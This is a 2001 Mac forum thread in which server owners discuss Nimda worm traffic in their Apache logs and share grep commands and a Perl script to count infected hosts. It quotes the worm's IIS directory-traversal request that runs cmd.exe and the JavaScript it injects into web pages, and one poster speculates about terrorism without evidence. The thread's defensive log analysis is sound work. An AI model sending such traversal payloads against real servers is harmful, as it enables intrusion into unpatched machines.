Code Red III

fiznutz

mind bender
any one seen this,The logs are going crazy its supposedly called Nimda makes Code Red look like the folks on the retirement home ive gotten like 5 hits a min in contrast to Code Reds 68 per day this is for sure going to screw up M$ servers.
Ive tried with no succes to modify,was it whitesaints scripts to count this new bastard.But my unix skills are limited.
Check your logs its crazy!
 

Red Phoenix

Registered
I get the same thing. It's full of things like

GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Fortunately, the latest BetterConsole has transparency and doesn't pop up all the way to the front when this happens.
 

Darkshadow

wandering shadow
That <b>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307</b> is actually the backdoor hack that Code Red II implements ... this thing tries 16 different ways to infect a server, the backdoor Code Red II made being one of 'em. Freakin annoying, I've already gotten over 100 hits from this in the past hour and a half! And I'm only on a dialup connection. I'd hate to have an all-the-time connection, your log would get to monstrous proportions :p (Let me gloat, it's not like I usually get to say "Yeah, my 56K modem that only connects at 31200 bps is better than your T1/Cable/DSL." Heh)

I'm thinking I'll add to the daily script to clean out my http logs until this one blows over...
 

jimr

McInstigator
I had to patch my router and add some new filters to stay on line.


This one sends 16 messages at a time. as opposed to the CODE RED
which was only exploiting one hole.

I found that most of the machines had only up to 6 vulnerabilities during August infections.

the ones that had up to 6 were able to be shut down by davebrits script.

Yesterday, I found one with 13 vulnerabilities.!!!!

then when I linked to that machine it sent a copy of the bug to me via http.

Mozilla popped up and said what to do with this octet-binary.

Then, I said, send it to hexedit.

so hex edit opens and totally surprised to see: <b> like a dictionary of Windows hacks inside of this thing!!!</b>

plus a javascript which it attaches to the bottom of every html page on the server.

the javascript is basically

<b>window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</b>

6000 from the top of the window that is....!!!


Internet explorer(OSX) just tried to display the multipart mime information in a window it opened at the top of the screen. (not at 6000!!!)

some people still might answer yes to execution on windows or save to disk and then double click it to open it.

the file was called readme.eml

when you save it, it naturally saves as readme.exe (or 2983fejy.exe)

Never much of a reason to put a readme into an executable...these days.

Anyway, the site I found was owned by the Japanese government and was an information site for kids and parents about some activity center.

I nabbed their fax number and sent them a message
(Japanese seem to never have a contact e-mail address on the web site <br>comes from using windows I guess).
the site was missing in the morning.



Then the same code may become embeded in every mail message which goes out from the server.

unpatched versions of outlook will open it and execute without any warning.
<blockquote>
So this thing is really easy to get..... especially in the family computer.
</blockquote>
<b>
and then it proceeds to <br>--replace a bunch of other files with itself(so it runs often if you use the machine--if you can actually use one of these machines.),<br>-- give "guest" admin priveliges, <br>--share all of your drives to the net. <br>--mess up your mail and all your webpages

!!!
</b>
so, Like Bush is planning, someone is just <br>"smoking Microsoft out of their
holes and they will be Destroyed".

The Attorney General denies it, but certainly the persistant rumor in my mind
is that this is related to a Terroristic attack on the internet.
<ul>
<li>First discovered 9:00am one week after the Attack on WTC.

<li>also this is exactly 3 months from Microsoft announcement of the discovery of CODE RED I June 18 th, 2001.
</ul>

<i>mac users stay alert please.!!!!!!</i>
 

Darkshadow

wandering shadow
I kinda doubt it's from terrorists. They want to do something that's actually going to cause widespread panic - and while sysadmins everywhere are probably going "God, what's next" it isn't actually affecting the mass population *that* much.

I threw together a perl script that will list the addresses & the number of hits you've gotten from this worm. It was a quick thing I did, so feel free to optimize it if ya want (if ya do, post back what ya added so I can join in the fun too!). One thing to note, it doesn't list the very first address returned. Dunno why. Actually, I know why, I'm not a big giant perl scriptor. :p

I noticed that all the hits from the worm are coming from the same network block I'm on...so I'm guessing it doesn't do random IP numbers like Code Red does. Lot more annoying though. :mad:

You can get the script <a href="http://homepage.mac.com/darkshadow2/misc/newworm.pl">here</a>.
 

Red Phoenix

Registered
I noticed that all the attacks I was getting were local, too (before, i would get things on Road Runner, but they would be from Hawaii or California, when I'm in Ohio). It seems to stick to the computer's subnet mask. So here's a question: does Nidma actually do anything, other than show that there are a ton of holes in Windows? I mean, if it finds a hole, does it do anything after that? Not having a weakling of a machine that I care to infect, I haven't seen any damage other than slow network access come from all this.
 

RacerX

Old Rhapsody User
Maybe that is the "concept" part. It could have been designed to test a delivery systems and got away from the designers. If it was released by accident, before a package could be added, then this may stop a future release (or make it less effective). At any rate, this is just another spot light of the problems with the security of Microsoft's operating systems.
 

Red Phoenix

Registered
Macosxhints.com has a post on their page (although it was missing a "q" when I read it) that typing

grep -i "_vti_bin" /var/log/httpd/access_log* | cut -f 1 -d ' ' | sort | uniq

in the Terminal will give all of the unique IPs of the infected machines, and typing

grep -i "_vti_bin" /var/log/httpd/access_log* | cut -f 1 -d ' ' | sort | uniq | wc -l

will count how many those were. Just 57 hours after Nidma was first released, I have been attacked by 260 different IPs. Freakin' Windows.
 

IanTheTerrible

Registered
Another interesting command, based on the fact that most of the requests Nimda sends are attempting to retrieve .exe files:

cat /path/to/apache/log | grep .exe | wc -l

will return the total count of requests for .exe files. Obviously, if you're actually serving .exe files, you'll want to adjust the grep pattern.

I've taken over 28,000 hits (DSL connection) so far.

--Ian the Terrible
 

jimr

McInstigator
<blockquote>
So here is a question: does nidma actually do any...
</blockquote>

To MacOSX no.

To windows..plenty

replaces various key system files with copies of itself

richedit32.dll....not minor for Word users.

gives "guest users" admin privelidges

looks like there is not an easy way to clean it up.

that's pretty damaging.

There was another rather harmless "concept" virus word macro in 1996.
this is unrelated.

the executable if you see it has

<code>
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
</code>
there have been links posted which answer your questions.
 

Darkshadow

wandering shadow
I updated the perl script. Now it shows the first address returned (found out my goof), displays them in a table rather than in a single column (I hadn't thought of how long that list would get :p), and I added in the total number of requests made from the worm - should've thought of that one in the first place! (uses .exe to search for, so like <b>IanTheTerrible</b> said, if you serve .exe files, you should change that...I think c+dir would work, as all the strings it sends have that in 'em, too).

My script actually does use the commands from MacOSXHints.com - a little modified. Well, really, just changed it from searching for _vti_bin to MSADC. I saw in my logs that every once in a while, a worm won't try all 16 requests, but only the first 6 or so. When that happens, it never calls for the _vti_bin one, so that wouldn't show up. I changed that to MSADC, 'cause that's in the second string that it sends & is in all of 'em.

ya can grab the script here: <a href="http://homepage.mac.com/darkshadow2/misc/newworm.pl">newworm.pl</a>

(Heh, ok, not a very original file name. So sue me! :D)
 

Powermaster

Site Supporter
Netbarrier seems to stop nimda attacks. I have had 44 ip address banned in the last couple days. Netbarrier detects the nimda and code red, and at you can choose in the options to have the sending ip address banned. It saves me a lot of ole bandwidth.
 
Top